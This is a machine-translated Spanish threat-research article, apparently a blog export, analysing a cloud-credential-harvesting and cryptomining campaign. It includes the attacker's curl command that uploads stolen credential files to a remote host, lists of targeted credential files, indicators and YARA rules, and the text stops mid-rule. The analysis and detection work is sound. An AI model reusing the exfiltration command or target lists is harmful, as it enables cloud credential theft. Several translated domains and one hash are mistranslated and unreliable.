{"id":917659,"date":"2023-08-23T21:19:04","date_gmt":"2023-08-23T21:19:04","guid":{"rendered":"https:\/\/teknomers.com\/es\/enfoque-agil-para-la-recoleccion-masiva-de-credenciales-en-la-nube-y-los-sprints-de-criptomineria-que-se-avecinan\/"},"modified":"2023-08-23T21:19:07","modified_gmt":"2023-08-23T21:19:07","slug":"enfoque-agil-para-la-recoleccion-masiva-de-credenciales-en-la-nube-y-los-sprints-de-criptomineria-que-se-avecinan","status":"publish","type":"post","link":"https:\/\/teknomers.com\/es\/enfoque-agil-para-la-recoleccion-masiva-de-credenciales-en-la-nube-y-los-sprints-de-criptomineria-que-se-avecinan\/","title":{"rendered":"Enfoque \u00e1gil para la recolecci\u00f3n masiva de credenciales en la nube y los sprints de criptominer\u00eda que se avecinan"},"content":{"rendered":"<p> <br \/>\n<\/p>\n<div>\n<p><span class=\"p-author\"><i class=\"icon-font icon-calendar\">\ue802<\/i><span class=\"author\">23 de agosto de 2023<\/span><i class=\"icon-font icon-user\">\ue804<\/i><span class=\"author\">Las noticias de los piratas inform\u00e1ticos<\/span><\/span><span class=\"p-tags\">Malware\/Ciberseguridad<\/span><\/p>\n<\/div>\n<div id=\"articlebody\">\n<div class=\"separator\" style=\"clear: both;\"><\/div>\n<p>Los desarrolladores no son las \u00fanicas personas que han adoptado la metodolog\u00eda \u00e1gil para sus procesos de desarrollo.  Del 15 de junio de 2023 al 11 de julio de 2023, el equipo de p0 Labs de Permiso Security identific\u00f3 y rastre\u00f3 a un atacante que desarrollaba e implementaba ocho (8) iteraciones incrementales de su malware de recolecci\u00f3n de credenciales mientras continuaba desarrollando infraestructura para un pr\u00f3ximo (spoiler: ahora lanzado). ) campa\u00f1a dirigida a varios servicios en la nube.<\/p>\n<p>Mientras que la semana pasada Aqua Security <a rel=\"nofollow noopener\" href=\"https:\/\/blog.aquasec.com\/threat-alert-anatomy-of-silentbobs-cloud-attack\" target=\"_blank\">publicado<\/a> un blog que detalla las etapas de esta campa\u00f1a en desarrollo relacionadas con im\u00e1genes de Docker infectadas, hoy <a rel=\"nofollow noopener\" href=\"https:\/\/permiso.io\/p0-labs\/\" target=\"_blank\">Laboratorios Permiso p0<\/a> y <a rel=\"nofollow noopener\" href=\"https:\/\/s1.ai\/cloudcreds\" target=\"_blank\">Laboratorios centinela<\/a> est\u00e1n publicando una investigaci\u00f3n conjunta que destaca las actualizaciones incrementales de las credenciales de la nube que recopilan muestras de malware recopiladas sistem\u00e1ticamente mediante el monitoreo de la infraestructura del atacante.  As\u00ed que lev\u00e1ntese de sus asientos y disfrute de esta reuni\u00f3n de scrum dedicada a compartir conocimientos sobre la campa\u00f1a de estos actores y las herramientas que utilizar\u00e1n para robar m\u00e1s credenciales de la nube.<\/p>\n<p>Si le gustan las capturas de pantalla de IDA en sus blogs de an\u00e1lisis, aseg\u00farese de consultar <a rel=\"nofollow noopener\" href=\"https:\/\/s1.ai\/cloudcreds\" target=\"_blank\">Laboratorios centinela<\/a>\u00a1Acepta esta campa\u00f1a!<\/p>\n<h2 style=\"text-align: left;\">Campa\u00f1as anteriores<\/h2>\n<p>Ha habido muchas campa\u00f1as en las que los actores han utilizado herramientas similares para realizar extracci\u00f3n de credenciales en la nube y al mismo tiempo implementar masivamente software de criptominer\u00eda.  Como recordatorio, en diciembre, el equipo de Permiso inform\u00f3 los detalles de un actor. <a rel=\"nofollow noopener\" href=\"https:\/\/permiso.io\/blog\/s\/christmas-cloud-cred-harvesting-campaign\/\" target=\"_blank\">Dirigido al p\u00fablico Notebooks Juptyer<\/a> con este conjunto de herramientas.<\/p>\n<p>Nuestros amigos de Cado tambi\u00e9n han informado extensamente sobre <a rel=\"nofollow noopener\" href=\"https:\/\/www.cadosecurity.com\/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials\/\" target=\"_blank\">campa\u00f1as anteriores<\/a>.<\/p>\n<h2 style=\"text-align: left;\">Campa\u00f1a activa<\/h2>\n<p>El 11 de julio de 2023, mientras prepar\u00e1bamos el lanzamiento de este blog sobre el conjunto de herramientas en desarrollo, el actor inici\u00f3 su campa\u00f1a.<\/p>\n<div class=\"separator\" style=\"clear: both;\"><img decoding=\"async\" src=\"https:\/\/teknomers.com\/es\/wp-content\/uploads\/2023\/08\/1692825542_241_Enfoque-agil-para-la-recoleccion-masiva-de-credenciales-en-la.jpg\" alt=\"\" border=\"0\" data-original-height=\"688\" data-original-width=\"728\"\/><\/div>\n<p>El archivo b.sh es el script de inicializaci\u00f3n que descarga e implementa la funcionalidad completa del conjunto de herramientas.  Las caracter\u00edsticas principales son instalar una puerta trasera para un acceso continuo, implementar utilidades de miner\u00eda de criptomonedas y buscar y difundir a otros sistemas vulnerables.<\/p>\n<p>Actualmente (12 de julio de 2023), hay 39 sistemas comprometidos en esta campa\u00f1a:<\/p>\n<div class=\"separator\" style=\"clear: both;\"><img decoding=\"async\" src=\"https:\/\/teknomers.com\/es\/wp-content\/uploads\/2023\/08\/1692825542_241_Enfoque-agil-para-la-recoleccion-masiva-de-credenciales-en-la.jpg\" alt=\"\" border=\"0\" data-original-height=\"455\" data-original-width=\"728\"\/><\/div>\n<h2 style=\"text-align: left;\">\u00bfQu\u00e9 hay de nuevo?<\/h2>\n<p>Las utilidades de recolecci\u00f3n de credenciales en la nube de esta campa\u00f1a tienen algunas diferencias notables con respecto a las versiones anteriores.  Los siguientes son los aspectos m\u00e1s destacados de las modificaciones:<\/p>\n<ul style=\"text-align: left;\">\n<li><strong>Soporte multinube<\/strong>:<\/li>\n<ul>\n<li>Se agreg\u00f3 soporte para GCP<\/li>\n<li>GCLOUD_CREDS_FILES=(&#8220;config_sentinel&#8221; &#8220;gce&#8221; &#8220;.last_survey_prompt.yaml&#8221; &#8220;config_default&#8221; &#8220;active_config&#8221; &#8220;credentials.db&#8221; &#8220;access_tokens.db&#8221; &#8220;.last_update_check.json&#8221; &#8220;.last_opt_in_prompt.yaml&#8221; &#8220;.feature_flags_config.yaml&#8221; &#8221; adc.json&#8221; &#8220;recurso.cache&#8221;)<\/li>\n<\/ul>\n<li>Se agreg\u00f3 soporte de Azure al buscar y extraer credenciales de cualquier archivo llamado azure.json<\/li>\n<li>Numerosos cambios estructurales y sint\u00e1cticos resaltan el cambio de la orientaci\u00f3n de AWS a la nube m\u00faltiple:<\/li>\n<ul>\n<li>Matrices de nombres de archivos confidenciales divididas por servicio en la nube:<\/li>\n<ul>\n<li>CRED_FILE_NAMES \u2192 AWS_CREDS_FILES, AZURE_CREDS_FILES y GCLOUD_CREDS_FILES<\/li>\n<\/ul>\n<li>Nombres de funciones gen\u00e9ricos:<\/li>\n<ul>\n<li>enviar_aws_data \u2192 enviar_datos<\/li>\n<\/ul>\n<li>Encabezados de la secci\u00f3n de salida modificados:<\/li>\n<ul>\n<li>INFORMACI\u00d3N \u2192 INFORMACI\u00d3N DE AWS<\/li>\n<li>IAM \u2192 DATOS DE USUARIO IAM<\/li>\n<li>EC2 \u2192 EC2 DATOS DE USUARIO<\/li>\n<\/ul>\n<\/ul>\n<li><strong>Archivos de destino<\/strong>: Se agreg\u00f3 &#8220;kubeconfig&#8221; &#8220;adc.json&#8221; &#8220;azure.json&#8221; &#8220;clusters.conf&#8221; &#8220;docker-compose.yaml&#8221; &#8220;.env&#8221; a la variable CRED_FILE_NAMES.  redis.conf.not.exist agregado con una variable MIXED_CREDFILES.<\/li>\n<li><strong>Nuevo rizo<\/strong>: Se cambi\u00f3 de la funci\u00f3n de descarga (&#8220;curl sin curl&#8221;) a descargar el binario curl preparado para eventualmente usar el binario curl nativo.<\/li>\n<li><strong>CLI de AWS<\/strong>: aws sts get-caller-identity para validar las credenciales de la nube y la informaci\u00f3n de identidad<\/li>\n<ul>\n<li><strong>Infraestructura<\/strong>: La mayor\u00eda de las campa\u00f1as anteriores alojaron servicios p\u00fablicos y C2 en un solo dominio.  En esta campa\u00f1a, el actor utiliza varios FQDN (incluido un disfraz notable de instancia EC2: ap-northeast-1.compute.internal.anondns[.]neto).<\/li>\n<ul>\n<li>Numerosos elementos de la infraestructura y el c\u00f3digo del actor dan peso a que el autor sea un hablante nativo de alem\u00e1n (adem\u00e1s del hecho de que la herramienta de c\u00f3digo abierto TeamTNT ya tiene muchos elementos alemanes en su c\u00f3digo).<\/li>\n<ul>\n<li>Una de las versiones intermedias de aws.sh hac\u00eda referencia al FQDN ap-northeast-1.compute.internal.anondns[.]net, que devolvi\u00f3 el mensaje de error alem\u00e1n Fehler!  \u00a1\u00a1\u00a1Vergleiche bitte die Authentifizierungsmerkmale in beiden Scripten!!!  (\u00a1que se traduce como Error! \u00a1Compare las funciones de autenticaci\u00f3n en ambos scripts!) cuando lo visite un an\u00e1lisis de VirusTotal el 23 de junio de 2023:<\/li>\n<\/ul>\n<div class=\"separator\" style=\"clear: both;\"><img decoding=\"async\" src=\"https:\/\/teknomers.com\/es\/wp-content\/uploads\/2023\/08\/1692825543_401_Enfoque-agil-para-la-recoleccion-masiva-de-credenciales-en-la.jpg\" alt=\"\" border=\"0\" data-original-height=\"453\" data-original-width=\"728\"\/><\/div>\n<\/ul>\n<\/ul>\n<\/ul>\n<ul style=\"text-align: left;\">\n<ul>\n<ul>\n<ul>\n<li>Una b\u00fasqueda en Google del mensaje de error anterior revela un \u00fanico resultado de un foro alem\u00e1n del 8 de octubre de 2008 (<a rel=\"nofollow noopener\" href=\"https:\/\/administrator.de\/tutorial\/upload-von-dateien-per-batch-curl-und-php-auf-einen-webserver-ohne-ftp-98399.html\" target=\"_blank\">https:\/\/administrator.de\/tutorial\/upload-von-dateien-per-batch-curl-und-php-auf-einen-webserver-ohne-ftp-98399.html<\/a>) que contiene c\u00f3digo para un cargador de archivos PHP llamado upload.php donde la autenticaci\u00f3n fallida bloquea la declaraci\u00f3n de error exacta del eco.  El nombre de archivo upload.php tambi\u00e9n era el URI para las versiones 2 y 3 de aws.sh del atacante, y el comando curl del atacante (que se muestra a continuaci\u00f3n) contiene una sintaxis de argumento \u00fanica id\u00e9ntica al comando de ejemplo en la misma publicaci\u00f3n del foro.<\/li>\n<div class=\"separator\" style=\"clear: both;\"><img decoding=\"async\" src=\"https:\/\/teknomers.com\/es\/wp-content\/uploads\/2023\/08\/1692825544_422_Enfoque-agil-para-la-recoleccion-masiva-de-credenciales-en-la.jpg\" alt=\"\" border=\"0\" data-original-height=\"580\" data-original-width=\"728\"\/><\/div>\n<li>Los \u00faltimos asentimientos alemanes est\u00e1n en los argumentos del comando curl.  El indicador m\u00e1s evidente es el argumento Datei= en las versiones 2-8 de aws.sh, ya que &#8220;Datei&#8221; es la palabra alemana para &#8220;archivo&#8221;.  La observaci\u00f3n m\u00e1s sutil est\u00e1 en la contrase\u00f1a codificada (oeireop\u00fcigreigroei) en las versiones 2 y 3 de aws.sh, espec\u00edficamente la presencia del \u00fanico car\u00e1cter no latino: \u00fc.<\/li>\n<\/ul>\n<\/ul>\n<\/ul>\n<\/ul>\n<div class=\"custom-code\">\n<pre><code><span style=\"color: #361292;\">send_data<\/span><span>()<br\/><\/span><span>curl -F <\/span><span>\"username=jegjrlgjhdsgjh\"<\/span><span> -F <\/span><span>\"password=oeireop\u00fcigreigroei\"<\/span><span> -F \\<br\/><\/span><span\/><span>\"Datei=@\"<\/span><span>$CSOF<\/span><span>\"\"<\/span><span> -F <\/span><span>\"Send=1\"<\/span><span> &lt;https:\/\/everlost.anondns.net\/upload.php&gt;<br\/><\/span><\/code><\/pre>\n<\/div>\n<p>Tanto el nombre de usuario como la contrase\u00f1a son indicativos de una ejecuci\u00f3n del teclado: el nombre de usuario en las teclas de la fila de inicio y la contrase\u00f1a en las teclas de la fila superior.  Sin embargo, dado que todos los dem\u00e1s caracteres son latinos, el escenario probable que producir\u00eda una \u00fanica \u00fc es el uso de un teclado virtual.  Dado que la \u00fc sigue inmediatamente a la letra p en la contrase\u00f1a, los \u00fanicos dos dise\u00f1os de teclado virtual que contienen una \u00fc adyacente al car\u00e1cter p son para los idiomas estonio y alem\u00e1n.<\/p>\n<h2 style=\"text-align: left;\">Ciclo de vida del desarrollo del atacante<\/h2>\n<p>El seguimiento de la infraestructura de este atacante a lo largo de un mes ha proporcionado al equipo de Permiso informaci\u00f3n sobre el proceso de desarrollo del actor y las modificaciones realizadas en cada iteraci\u00f3n.  \u00a1Qu\u00e9 mejor manera de mostrarlo que con un registro de cambios!  El siguiente es un registro de cambios de las actualizaciones incrementales realizadas en la utilidad de recolecci\u00f3n de credenciales aws.sh:<\/p>\n<div class=\"custom-code\">\n<pre><code><span># v1(28165d28693ca807fb3d4568624c5ba9) -&gt; v2(b9113ccc0856e5d44bab8d3374362a06)<br\/><\/span>[*] updated function name from int_main() to run_aws_grabber() (though not executed in script)<br\/>[*] updated function name from send_aws_data() to send_data()<br\/>[*] updated function name from files_aws() to cred_files()<br\/>[*] updated function name from docker_aws() to get_docker() with similar functionality<br\/>[*] split env_aws() function's logic into three (3) new functions: get_aws_infos(), get_aws_meta(), get_aws_env()<br\/>[+] added function get_awscli_data() which executes aws sts get-caller-identity command<br\/>[+] added two (2) functions with new functionality (returning contents of sensitive file names and environment variables): get_azure(), get_google()<br\/>[-] removed strings_proc_aws function containing strings \/proc\/*\/env* | sort -u | grep 'AWS|AZURE|KUBE' command enumerating environment variables<br\/>[-] removed ACF file name array (though all values except .npmrc, cloud and credentials.gpg were already duplicated in CRED_FILE_NAMES array)<br\/>[+] added new empty AZURE_CREDS_FILES file name array (though not used in script)<br\/>[+] added new AWS_CREDS_FILES file name array (though not used in script) with the following values moved from CRED_FILE_NAMES file name array: credentials, .s3cfg, .passwd-s3fs, .s3backer_passwd, .s3b_config, s3proxy.conf<br\/>[+] added new GCLOUD_CREDS_FILES file name array (though not used in script) with the following net new values: config_sentinel, gce, .last_survey_prompt.yaml, config_default, active_config, credentials.db, .last_update_check.json, .last_opt_in_prompt.yaml, .feature_flags_config.yaml, resource.cache<br\/>[+] added copy of duplicate values access_tokens.db and adc.json from CRED_FILE_NAMES file name array to GCLOUD_CREDS_FILES file name array<br\/>[+] added netrc, kubeconfig, adc.json, azure.json, env, clusters.conf, grafana.ini and an empty string to CRED_FILE_NAMES file name array<br\/>[-] removed credentials.db from CRED_FILE_NAMES file name array<br\/>[-] removed dload function (downloader capability, i.e. \"curl without curl\")<br\/>[+] added commented dload function invocation for posting final results<br\/>[+] added commented wget command to download and execute https:\/\/everlost.anondns[.]net\/cmd\/tmate.sh<br\/>[*] replaced execution of dload function with native curl binary<br\/>[*] replaced references to \/tmp\/.curl with native curl binary<br\/>[-] removed base64 encoding of final results<br\/>[+] added username and password to curl command: \"username=jegjrlgjhdsgjh\" \"password=oeireop\u00fcigreigroei\"<br\/>[*] updated URI for posting final results from \/in.php?base64=$SEND_B64_DATA to \/upload.php<br\/>[*] renamed LOCK_FILE from \/tmp\/...aws4 to \/tmp\/..a.l$(echo $RANDOM)<br\/>[-] removed rm -f $LOCK_FILE command<br\/>[-] removed history -cw command (clear history list and overwrite history file) at end of script<br\/>[*] converted numerous long commands into shorter multi-line syntax<p>-------<\/p><p># v2(b9113ccc0856e5d44bab8d3374362a06) -&gt; v3(d9ecceda32f6fa8a7720e1bf9425374f)<br\/>[+] added execution of previously unused run_aws_grabber() function<br\/>[+] added function get_prov_vars with nearly identical strings \/proc\/*\/env* command found in previously removed strings_proc_aws function (though with previous grep 'AWS|AZURE|KUBE' command removed)<br\/>[+] added logic to search for files listed in previously unused file name arrays: AWS_CREDS_FILES, GCLOUD_CREDS_FILES<br\/>[+] added new file name array MIXED_CREDFILES=(\"redis.conf\") (though not used in script)<br\/>[+] added docker-compose.yaml to CRED_FILE_NAMES file name array<br\/>[*] updated env to .env in CRED_FILE_NAMES file name array<br\/>[-] removed config from AWS_CREDS_FILES file name array<br\/>[*] updated echo output section header from INFO to AWS INFO<br\/>[*] updated echo output section header from IAM to IAM USERDATA<br\/>[*] updated echo output section header from EC2 to EC2 USERDATA<br\/>[-] removed commented dload function invocation for posting final results<\/p><p>-------<\/p><p># v3(d9ecceda32f6fa8a7720e1bf9425374f) -&gt; v4(0855b8697c6ebc88591d15b954bcd15a)<br\/>[*] replaced strings \/proc\/*\/env* command with cat \/proc\/*\/env* command in get_prov_vars function<br\/>[*] updated username and password to curl command from \"username=jegjrlgjhdsgjh\" \"password=oeireop\u00fcigreigroei\" to \"username=1234\" -F \"password=5678\"<br\/>[*] updated FQDN for posting final results from everlost.anondns[.]net to ap-northeast-1.compute.internal.anondns[.]net (masquerading as AWS EC2 instance FQDN)<br\/>[*] updated URI for posting final results from \/upload.php to \/insert\/keys.php<\/p><p>-------<\/p><p># v4(0855b8697c6ebc88591d15b954bcd15a) -&gt; v5(f7df739f865448ac82da01b3b1a97041)<br\/>[*] updated FQDN for posting final results from ap-northeast-1.compute.internal.anondns[.]net to silentbob.anondns[.]net<br\/>[+] added SRCURL variable to store FQDN (later expanded in final curl command's URL)<br\/>[+] added if type aws logic to only execute run_aws_grabber function if AWS CLI binary is present<\/p><p>-------<\/p><p># v5(f7df739f865448ac82da01b3b1a97041) -&gt; v6(1a37f2ef14db460e5723f3c0b7a14d23)<br\/>[*] updated redis.conf to redis.conf.not.exist in MIXED_CREDFILES file name array<br\/>[*] updated LOCK_FILE variable from \/tmp\/..a.l$(echo $RANDOM) to \/tmp\/..a.l<\/p><p>-------<\/p><p># v6(1a37f2ef14db460e5723f3c0b7a14d23) -&gt; v7(99f0102d673423c920af1abc22f66d4e)<br\/>[-] removed grafana.ini from CRED_FILE_NAMES file name array<\/p><p>-------<\/p><p># v7(99f0102d673423c920af1abc22f66d4e) -&gt; v8(5daace86b5e947e8b87d8a00a11bc3c5)<br\/>[-] removed MIXED_CREDFILES file name array<br\/>[+] added new file name array DBS_CREDFILES=(\"postgresUser.txt\" \"postgresPassword.txt\")<br\/>[+] added awsAccessKey.txt and awsKey.txt to AWS_CREDS_FILES file name array<br\/>[+] added azure.json to AZURE_CREDS_FILES file name array (already present in CRED_FILE_NAMES file name array)<br\/>[+] added hostname command output to final result<br\/>[+] added curl -sLk ipv4.icanhazip.com -o- command output to final result<br\/>[+] added cat \/etc\/ssh\/sshd_config | grep 'Port '|awk 'print $2' command output to final result<br\/>[*] updated LOCK_FILE variable from \/tmp\/..a.l to \/tmp\/..pscglf_<\/p><\/code><\/pre>\n<\/div>\n<h2 style=\"text-align: left;\">Infraestructura del atacante<\/h2>\n<p>Los actores que utilizan herramientas TeamTNT modificadas como esta tienen tendencia a utilizar el servicio de alojamiento Nice VPS.  Esta campa\u00f1a no es una excepci\u00f3n en ese sentido.  El actor ha registrado al menos cuatro (4) dominios para esta campa\u00f1a a trav\u00e9s de anondns, todos menos uno apuntan actualmente a la direcci\u00f3n IP de Nice VPS 45.9.148.108.  El dominio everfound.anondns.net actualmente se resuelve en la direcci\u00f3n IP 207.154.218.221<\/p>\n<p>Los dominios actualmente involucrados en esta campa\u00f1a son:<\/p>\n<table style=\"border-collapse: collapse; border: 1px solid rgb(153, 172, 194); table-layout: fixed;\">\n<tbody>\n<tr>\n<th>\n<p>Dominio\n<\/th>\n<th>\n<p>visto por primera vez\n<\/th>\n<\/tr>\n<tr>\n<td>\n<p>everlost.anondns[.]neto\n<\/td>\n<td>\n<p>2023-06-11 10:35:09UTC\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p>ap-noreste-1.compute.internal.anondns[.]neto\n<\/td>\n<td>\n<p>2023-06-16 15:24:16UTC\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p>silenciobob.anondns[.]neto\n<\/td>\n<td>\n<p>2023-06-24 16:53:46UTC\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p>everfound.anondns[.]neto\n<\/td>\n<td>\n<p>2023-07-02 21:07:50UTC\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Si bien la mayor\u00eda de las actividades recientes de desarrollo de atacantes se han producido en silentbob.anondns.net, consideramos que el dominio enmascarado de AWS ap-northeast-1.compute.internal.anondns.net es el m\u00e1s interesante, pero Jay y Silent Bob aportan mucho. Mejor portada del blog para respetar la elecci\u00f3n del atacante en los FQDN.<\/p>\n<h2 style=\"text-align: left;\">Indicadores<\/h2>\n<table style=\"border-collapse: collapse; border: 1px solid rgb(153, 172, 194); margin-left: auto; margin-right: auto; table-layout: fixed;\">\n<tbody>\n<tr>\n<th>Indicador<\/th>\n<th>Tipo<\/th>\n<th>Notas<\/th>\n<\/tr>\n<tr>\n<td>everlost.anondns[.]neto<\/td>\n<td>Dominio<\/td>\n<td> <\/td>\n<\/tr>\n<tr>\n<td>ap-noreste-1.compute.internal.anondns[.]neto<\/td>\n<td>Dominio<\/td>\n<td> <\/td>\n<\/tr>\n<tr>\n<td>silenciobob.anondns[.]neto<\/td>\n<td>Dominio<\/td>\n<td> <\/td>\n<\/tr>\n<tr>\n<td>everfound.anondns[.]neto<\/td>\n<td>Dominio<\/td>\n<td> <\/td>\n<\/tr>\n<tr>\n<td>207.154.218[.]221<\/td>\n<td>IPv4<\/td>\n<td> <\/td>\n<\/tr>\n<tr>\n<td>45.9.148[.]108<\/td>\n<td>IPv4<\/td>\n<td> <\/td>\n<\/tr>\n<tr>\n<td>28165d28693ca807fb3d4568624c5ba9<\/td>\n<td>MD5<\/td>\n<td>aws.sh v1<\/td>\n<\/tr>\n<tr>\n<td>b9113ccc0856e5d44bab8d3374362a06<\/td>\n<td>MD5<\/td>\n<td>aws.sh v2<\/td>\n<\/tr>\n<tr>\n<td>d9ecceda32f6fa8a7720e1bf9425374f<\/td>\n<td>MD5<\/td>\n<td>aws.sh v3<\/td>\n<\/tr>\n<tr>\n<td>0855b8697c6ebc88591d15b954bcd15a<\/td>\n<td>MD5<\/td>\n<td>aws.sh v4<\/td>\n<\/tr>\n<tr>\n<td>f7df739f865448ac82da01b3b1a97041<\/td>\n<td>MD5<\/td>\n<td>aws.sh v5<\/td>\n<\/tr>\n<tr>\n<td>1a37f2ef14db460e5723f3c0b7a14d23<\/td>\n<td>MD5<\/td>\n<td>aws.sh v6<\/td>\n<\/tr>\n<tr>\n<td>99f0102d673423c920af1abc22f66d4e<\/td>\n<td>MD5<\/td>\n<td>aws.sh v7<\/td>\n<\/tr>\n<tr>\n<td>5daace86b5e947e8b87d8a00a11bc3c5<\/td>\n<td>MD5<\/td>\n<td>aws.sh v8 (grab.sh)<\/td>\n<\/tr>\n<tr>\n<td>92d6cc158608bcec74cf9856ab6c94e5<\/td>\n<td>MD5<\/td>\n<td>usuario.sh<\/td>\n<\/tr>\n<tr>\n<td>cfb6d7788c94857ac5e9899a70c710b6<\/td>\n<td>MD5<\/td>\n<td>int.sh<\/td>\n<\/tr>\n<tr>\n<td>7044a31e9cd7fdbf10e6beba08c78c6b<\/td>\n<td>MD5<\/td>\n<td>limpio.sh<\/td>\n<\/tr>\n<tr>\n<td>58b92888443cfb8a4720645dc3dc9809<\/td>\n<td>MD5<\/td>\n<td>xc3.sh<\/td>\n<\/tr>\n<tr>\n<td>f60b75dsordo9703277bb2dc36c0f114b<\/td>\n<td>MD5<\/td>\n<td>b.sh (instalar script)<\/td>\n<\/tr>\n<tr>\n<td>2044446e6832577a262070806e9bf22c<\/td>\n<td>MD5<\/td>\n<td>charlar<\/td>\n<\/tr>\n<tr>\n<td>c2465e78a5d11afd74097734350755a4<\/td>\n<td>MD5<\/td>\n<td>rizo.completo<\/td>\n<\/tr>\n<tr>\n<td>f13b8eedde794e2a9a1e87c3a2b79bf4<\/td>\n<td>MD5<\/td>\n<td>tmate.sh<\/td>\n<\/tr>\n<tr>\n<td>87c8423e0815d6467656093bff9aa193<\/td>\n<td>MD5<\/td>\n<td>a<\/td>\n<\/tr>\n<tr>\n<td>9e174082f721092508df3f1aae3d6083<\/td>\n<td>MD5<\/td>\n<td>correr.sh<\/td>\n<\/tr>\n<tr>\n<td>203fe39ff0e59d683b36d056ad64277b<\/td>\n<td>MD5<\/td>\n<td>escaneo masivo<\/td>\n<\/tr>\n<tr>\n<td>2514cff4dbfd6b9099f7c83fc1474a2d<\/td>\n<td>MD5<\/td>\n<td> <\/td>\n<\/tr>\n<tr>\n<td>dafac2bc01806db8bf19ae569d85deae<\/td>\n<td>MD5<\/td>\n<td>datos.sh<\/td>\n<\/tr>\n<tr>\n<td>43Lfq18TycJHVR3AMews5C9f6SEfenZoQMcrsEeFXZTWcFW9jW7VeCySDm1L9n4d2JEoHjcDpWZFq6QzqN4QGHYZVaALj3U<\/td>\n<td>Billetera<\/td>\n<td> <\/td>\n<\/tr>\n<tr>\n<td>hxxp:\/\/silentbob.anondns.net\/insert\/metadata.php<\/td>\n<td>URL<\/td>\n<td> <\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2 style=\"text-align: left;\">Detecciones<\/h2>\n<div class=\"custom-code\">\n<pre><code><span>rule P0_Hunting_AWS_CredFileNames_1 <br\/><\/span>\tmeta:<br\/><span> description = <\/span><span>\"Detecting presence of scripts searching for numerous AWS credential file names\"<\/span><span><br\/><\/span><span> author = <\/span><span>\"daniel.bohannon@permiso.io (@danielhbohannon)\"<\/span><span><br\/><\/span><span> date = <\/span><span>\"2023-07-12\"<\/span><span><br\/><\/span><span> reference = <\/span><span>\"https:\/\/permiso.io\/blog\/s\/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining\/\"<\/span><span><br\/><\/span><span> md5_01 = <\/span><span>\"3e2cddf76334529a14076c3659a68d92\"<\/span><span><br\/><\/span><span> md5_02 = <\/span><span>\"b9113ccc0856e5d44bab8d3374362a06\"<\/span><span><br\/><\/span><span> md5_03 = <\/span><span>\"d9ecceda32f6fa8a7720e1bf9425374f\"<\/span><span><br\/><\/span><span> md5_04 = <\/span><span>\"28165d28693ca807fb3d4568624c5ba9\"<\/span><span><br\/><\/span><span> md5_05 = <\/span><span>\"0855b8697c6ebc88591d15b954bcd15a\"<\/span><span><br\/><\/span><span> md5_06 = <\/span><span>\"f7df739f865448ac82da01b3b1a97041\"<\/span><span><br\/><\/span><span> md5_07 = <\/span><span>\"1a37f2ef14db460e5723f3c0b7a14d23\"<\/span><span><br\/><\/span><span> md5_08 = <\/span><span>\"99f0102d673423c920af1abc22f66d4e\"<\/span><span><br\/><\/span><span> md5_09 = <\/span><span>\"99f0102d673423c920af1abc22f66d4e\"<\/span><span><br\/><\/span><span> md5_10 = <\/span><span>\"5daace86b5e947e8b87d8a00a11bc3c5\"<\/span><span><br\/><\/span>\tstrings:<br\/><span> <\/span><span>$credFileAWS_01<\/span><span> = <\/span><span>\"credentials\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileAWS_02<\/span><span> = <\/span><span>\".s3cfg\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileAWS_03<\/span><span> = <\/span><span>\".passwd-s3fs\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileAWS_04<\/span><span> = <\/span><span>\".s3backer_passwd\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileAWS_05<\/span><span> = <\/span><span>\".s3b_config\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileAWS_06<\/span><span> = <\/span><span>\"s3proxy.conf\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileAWS_07<\/span><span> = <\/span><span>\"awsAccessKey.txt\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileAWS_08<\/span><span> = <\/span><span>\"awsKey.txts\"<\/span><span><br\/><\/span><span> <\/span><span>$fileSearchCmd<\/span><span> = <\/span><span>\"find \"<\/span><span><br\/><\/span><span> <\/span><span>$fileAccessCmd_01<\/span><span> = <\/span><span>\"cat \"<\/span><span><br\/><\/span><span> <\/span><span>$fileAccessCmd_02<\/span><span> = <\/span><span>\"strings \"<\/span><span><br\/><\/span><span> <\/span><span>$fileAccessCmd_03<\/span><span> = <\/span><span>\"cp \"<\/span><span><br\/><\/span><span> <\/span><span>$fileAccessCmd_04<\/span><span> = <\/span><span>\"mv \"<\/span><span><br\/><\/span>\tcondition:<br\/><span> (3 of (<\/span><span>$credFileAWS<\/span><span>*)) and <\/span><span>$fileSearchCmd<\/span><span> and (any of (<\/span><span>$fileAccessCmd<\/span><span>*))<br\/><\/span><p>rule P0_Hunting_AWS_EnvVarNames_1 {<br\/>meta:<br\/><span> description = <\/span><span>\"Detecting presence of scripts searching for numerous environment variables containing sensitive AWS credential information. Explicitly excluding LinPEAS (and its variants) to remove noise since it is already well-detected.\"<\/span><span><br\/><\/span><span> author = <\/span><span>\"daniel.bohannon@permiso.io (@danielhbohannon)\"<\/span><span><br\/><\/span><span> date = <\/span><span>\"2023-07-12\"<\/span><span><br\/><\/span><span> reference = <\/span><span>\"https:\/\/permiso.io\/blog\/s\/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining\/\"<\/span><span><br\/><\/span><span> md5_01 = <\/span><span>\"3e2cddf76334529a14076c3659a68d92\"<\/span><span><br\/><\/span><span> md5_02 = <\/span><span>\"b9113ccc0856e5d44bab8d3374362a06\"<\/span><span><br\/><\/span><span> md5_03 = <\/span><span>\"d9ecceda32f6fa8a7720e1bf9425374f\"<\/span><span><br\/><\/span><span> md5_04 = <\/span><span>\"28165d28693ca807fb3d4568624c5ba9\"<\/span><span><br\/><\/span><span> md5_05 = <\/span><span>\"0855b8697c6ebc88591d15b954bcd15a\"<\/span><span><br\/><\/span><span> md5_06 = <\/span><span>\"f7df739f865448ac82da01b3b1a97041\"<\/span><span><br\/><\/span><span> md5_07 = <\/span><span>\"1a37f2ef14db460e5723f3c0b7a14d23\"<\/span><span><br\/><\/span><span> md5_08 = <\/span><span>\"99f0102d673423c920af1abc22f66d4e\"<\/span><span><br\/><\/span><span> md5_09 = <\/span><span>\"99f0102d673423c920af1abc22f66d4e\"<\/span><span><br\/><\/span><span> md5_10 = 